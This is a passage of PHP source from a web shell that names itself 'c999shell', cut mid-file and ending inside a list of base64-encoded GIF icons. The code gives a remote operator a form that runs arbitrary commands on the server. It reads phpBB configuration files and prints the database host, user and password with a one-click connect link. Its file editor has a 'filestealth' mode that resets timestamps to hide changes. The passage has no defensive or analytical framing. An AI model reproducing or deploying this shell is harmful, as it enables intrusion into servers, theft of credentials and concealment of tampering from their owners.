  2493.     echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
  2494.    }
  2495.    $encoded = "";
  2496.    if ($base64 == 1)
  2497.    {
  2498.     echo "<b>Base64 Encode</b><br>";
  2499.     $encoded = base64_encode(file_get_contents($d.$f));
  2500.    }
  2501.    elseif($base64 == 2)
  2502.    {
  2503.     echo "<b>Base64 Encode + Chunk</b><br>";
  2504.     $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
  2505.    }
  2506.    elseif($base64 == 3)
  2507.    {
  2508.     echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
  2509.     $encoded = base64_encode(file_get_contents($d.$f));
  2510.     $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
  2511.    }
  2512.    elseif($base64 == 4)
  2513.    {
  2514.     $text = file_get_contents($d.$f);
  2515.     $encoded = base64_decode($text);
  2516.     echo "<b>Base64 Decode";
  2517.     if (base64_encode($encoded) != $text) {echo " (failed)";}
  2518.     echo "</b><br>";
  2519.    }
  2520.    if (!empty($encoded))
  2521.    {
  2522.     echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
  2523.    }
  2524.    echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
  2525. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
  2526. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
  2527. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
  2528. <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
  2529. <P>";
  2530.   }
  2531.   elseif ($ft == "html")
  2532.   {
  2533.    if ($white) {@ob_clean();}
  2534.    echo $r;
  2535.    if ($white) {c999shexit();}
  2536.   }
  2537.   elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
  2538.   elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
  2539.   elseif ($ft == "phpsess")
  2540.   {
  2541.    echo "<pre>";
  2542.    $v = explode("|",$r);
  2543.    echo $v[0]."<br>";
  2544.    var_dump(unserialize($v[1]));
  2545.    echo "</pre>";
  2546.   }
  2547.   elseif ($ft == "exe")
  2548.   {
  2549.    $ext = explode(".",$f);
  2550.    $c = count($ext)-1;
  2551.    $ext = $ext[$c];
  2552.    $ext = strtolower($ext);
  2553.    $rft = "";
  2554.    foreach($exeftypes as $k=>$v)
  2555.    {
  2556.     if (in_array($ext,$v)) {$rft = $k; break;}
  2557.    }
  2558.    $cmd = str_replace("%f%",$f,$rft);
  2559.    echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
  2560.   }
  2561.   elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
  2562.   elseif ($ft == "code")
  2563.   {
  2564.    if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
  2565.    {
  2566.     $arr = explode("\n",$r);
  2567.     if (count($arr == 18))
  2568.     {
  2569.      include($d.$f);
  2570.      echo "<b>phpBB configuration is detected in this file!<br>";
  2571.      if ($dbms == "mysql4") {$dbms = "mysql";}
  2572.      if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
  2573.      else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c999shell. Please, report us for fix.";}
  2574.      echo "Parameters for manual connect:<br>";
  2575.      $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
  2576.      foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
  2577.      echo "</b><hr size=\"1\" noshade>";
  2578.     }
  2579.    }
  2580.    echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
  2581.    if (!empty($white)) {@ob_clean();}
  2582.    highlight_file($d.$f);
  2583.    if (!empty($white)) {c999shexit();}
  2584.    echo "</div>";
  2585.   }
  2586.   elseif ($ft == "download")
  2587.   {
  2588.    @ob_clean();
  2589.    header("Content-type: application/octet-stream");
  2590.    header("Content-length: ".filesize($d.$f));
  2591.    header("Content-disposition: attachment; filename=\"".$f."\";");
  2592.    echo $r;
  2593.    exit;
  2594.   }
  2595.   elseif ($ft == "notepad")
  2596.   {
  2597.    @ob_clean();
  2598.    header("Content-type: text/plain");
  2599.    header("Content-disposition: attachment; filename=\"".$f.".txt\";");
  2600.    echo($r);
  2601.    exit;
  2602.   }
  2603.   elseif ($ft == "img")
  2604.   {
  2605.    $inf = getimagesize($d.$f);
  2606.    if (!$white)
  2607.    {
  2608.     if (empty($imgsize)) {$imgsize = 20;}
  2609.     $width = $inf[0]/100*$imgsize;
  2610.     $height = $inf[1]/100*$imgsize;
  2611.     echo "<center><b>Size:</b>&nbsp;";
  2612.     $sizes = array("100","50","20");
  2613.     foreach ($sizes as $v)
  2614.     {
  2615.      echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
  2616.      if ($imgsize != $v ) {echo $v;}
  2617.      else {echo "<u>".$v."</u>";}
  2618.      echo "</a>&nbsp;&nbsp;&nbsp;";
  2619.     }
  2620.     echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
  2621.    }
  2622.    else
  2623.    {
  2624.     @ob_clean();
  2625.     $ext = explode($f,".");
  2626.     $ext = $ext[count($ext)-1];
  2627.     header("Content-type: ".$inf["mime"]);
  2628.     readfile($d.$f);
  2629.     exit;
  2630.    }
  2631.   }
  2632.   elseif ($ft == "edit")
  2633.   {
  2634.    if (!empty($submit))
  2635.    {
  2636.     if ($filestealth) {$stat = stat($d.$f);}
  2637.     $fp = fopen($d.$f,"w");
  2638.     if (!$fp) {echo "<b>Can't write to file!</b>";}
  2639.     else
  2640.     {
  2641.      echo "<b>Saved!</b>";
  2642.      fwrite($fp,$edit_text);
  2643.      fclose($fp);
  2644.      if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
  2645.      $r = $edit_text;
  2646.     }
  2647.    }
  2648.    $rows = count(explode("\r\n",$r));
  2649.    if ($rows < 10) {$rows = 10;}
  2650.    if ($rows > 30) {$rows = 30;}
  2651.    echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
  2652.   }
  2653.   elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
  2654.   else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
  2655.  }
  2656. }
  2657. }
  2658. else
  2659. {
  2660.  @ob_clean();
  2661.  $images = array(
  2662. "arrow_ltr"=>
  2663. "R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
  2664. "SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
  2665. "back"=>
  2666. "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  2667. "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
  2668. "Wg0JADs=",
  2669. "buffer"=>
  2670. "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
  2671. "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
  2672. "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
  2673. "change"=>
  2674. "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
  2675. "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
  2676. "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
  2677. "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
  2678. "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
  2679. "zMshADs=",
  2680. "delete"=>
  2681. "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
  2682. "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
  2683. "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
  2684. "vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
  2685. "ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
  2686. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2687. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
  2688. "BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
  2689. "STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
  2690. "BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
  2691. "jwVFHBgiEGQFIgQasYkcSbJQIAA7",
  2692. "download"=>
  2693. "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
  2694. "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
  2695. "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
  2696. "forward"=>
  2697. "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
  2698. "aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
  2699. "WqsJADs=",
  2700. "home"=>
  2701. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
  2702. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
  2703. "krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
  2704. "VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
  2705. "mode"=>
  2706. "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
  2707. "AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
  2708. "2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
  2709. "dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
  2710. "refresh"=>
  2711. "R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".
  2712. "AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".
  2713. "3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".
  2714. "R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",
  2715. "search"=>
  2716. "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
  2717. "/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
  2718. "s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
  2719. "AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
  2720. "Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
  2721. "setup"=>
  2722. "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
  2723. "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
  2724. "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
  2725. "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
  2726. "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
  2727. "small_dir"=>
  2728. "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
  2729. "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
  2730. "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
  2731. "small_unk"=>
  2732. "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
  2733. "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
  2734. "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
  2735. "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
  2736. "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
  2737. "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
  2738. "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
  2739. "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
  2740. "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2741. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2742. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2743. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2744. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2745. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2746. "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
  2747. "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
  2748. "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
  2749. "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
  2750. "yAsokBkQADs=",
  2751. "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
  2752. "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
  2753. "sort_asc"=>
  2754. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
  2755. "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
  2756. "sort_desc"=>
  2757. "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
  2758. "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
  2759. "sql_button_drop"=>
  2760. "R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  2761. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2762. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  2763. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  2764. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  2765. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  2766. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  2767. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  2768. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  2769. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  2770. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  2771. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  2772. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  2773. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
  2774. "AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
  2775. "AQEAOw==",
  2776. "sql_button_empty"=>
  2777. "R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  2778. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2779. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  2780. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  2781. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  2782. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  2783. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  2784. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  2785. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  2786. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  2787. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  2788. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  2789. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  2790. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".
  2791. "AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",
  2792. "sql_button_insert"=>
  2793. "R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
  2794. "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
  2795. "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
  2796. "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
  2797. "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
  2798. "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
  2799. "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
  2800. "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
  2801. "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
  2802. "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
  2803. "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
  2804. "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
  2805. "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
  2806. "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA".
  2807. "AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=",
  2808. "up"=>
  2809. "R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA".
  2810. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg".
  2811. "+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV".
  2812. "IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==",
  2813. "write"=>
  2814. "R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".
  2815. "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".
  2816. "EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".
  2817. "LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",
  2818. "ext_asp"=>
  2819. "R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/".
  2820. "/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI".
  2821. "D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=",
  2822. "ext_mp3"=>
  2823. "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".
  2824. "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".
  2825. "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
  2826. "ext_avi"=>
